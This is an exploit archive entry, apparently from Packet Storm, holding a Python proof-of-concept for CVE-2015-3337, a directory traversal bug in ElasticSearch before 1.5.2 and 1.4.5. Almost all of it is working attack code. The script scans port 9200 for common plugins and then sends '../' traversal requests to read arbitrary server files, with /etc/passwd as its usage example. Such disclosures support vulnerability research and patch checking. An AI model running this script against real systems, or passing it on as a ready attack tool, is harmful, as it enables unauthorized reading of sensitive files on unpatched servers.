ElasticSearch Directory Traversal Proof Of Concept

2015-05-01T00:00:00
ID PACKETSTORM:131718
Type packetstorm
Reporter John Heasman
Modified 2015-05-01T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign  
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5  
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net  
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/  
  
import socket, sys  
  
print "!dSR ElasticPwn - for CVE-2015-3337\n"  
if len(sys.argv) <> 3:  
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]  
sys.exit()  
  
port = 9200 # Default ES http port  
host = sys.argv[1]  
fpath = sys.argv[2]  
  
def grab(plugin):  
socket.setdefaulttimeout(3)  
s = socket.socket()  
s.connect((host,port))  
s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n"  
"Host: "+host+"\n\n")  
file = s.recv(2048)  
print " [*] Trying to retrieve "+str(fpath)+":"  
if ("HTTP/1.0 200 OK" in file):   
print "\n"+file  
else:  
print "[-] File Not Found or system not vulnerable"   
  
def pfind(plugin):  
try:  
socket.setdefaulttimeout(3)  
s = socket.socket()  
s.connect((host,port))  
s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n"  
"Host: "+host+"\n\n")  
file = s.recv(16)  
print "[*] Trying to find plugin "+plugin+":"  
if ("HTTP/1.0 200 OK" in file):   
print "[+] Plugin found!"  
grab(plugin)  
sys.exit()  
else:  
print "[-] Not Found "   
except Exception, e:  
print "[-] Error connecting to "+host+" "+str(e)  
sys.exit()  
  
# Include more plugin names to check if they are installed  
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']   
  
for plugin in pluginList:  
pfind(plugin)  
  
  
  
`